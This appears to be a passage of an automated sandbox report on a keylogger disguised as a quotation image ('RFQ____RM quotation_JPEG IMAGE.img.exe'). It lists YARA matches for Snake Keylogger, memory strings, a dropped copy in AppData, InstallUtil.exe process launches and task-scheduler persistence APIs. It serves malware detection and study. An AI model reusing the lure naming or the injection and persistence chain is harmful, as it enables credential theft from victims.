                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2112460663.00000000065D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000000.2052909448.0000000000C72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecrypted aw.exe6 vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.00000000034C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecrypted aw.exe6 vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004259000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003299000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2087239384.000000000144E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2110257215.00000000061F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecrypted aw.exe6 vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHlytzfcdj.dll" vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHlytzfcdj.dll" vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2110612573.0000000006280000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHlytzfcdj.dll" vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeBinary or memory string: OriginalFilenamecrypted aw.exe6 vs RFQ____RM quotation_JPEG IMAGE.img.exe
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: InstallUtil.exe PID: 3176, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, -kk-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, -kk-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, 2-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, 2-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.431fdb0.7.raw.unpack, 2-.csBase64 encoded string: 'sS3EzkPIq3urKzyR2NKtwlJBNfVk8azCI8Wgp4QmoZJ4fZbaHSKWnckEtYSxsT42'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@3/3
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeFile created: C:\Users\user\AppData\Roaming\Gydvapkca.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: InstallUtil.exe, 00000002.00000002.4524686788.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.0000000003107000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4532616204.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4524686788.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002F05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.4524242471.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RFQ____RM quotation_JPEG IMAGE.img.exeReversingLabs: Detection: 63%
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeFile read: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe "C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe"
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Gydvapkca.exe "C:\Users\user\AppData\Roaming\Gydvapkca.exe"
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Gydvapkca.exe "C:\Users\user\AppData\Roaming\Gydvapkca.exe"
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeSection loaded: ncryptsslp.dllJump to behavior
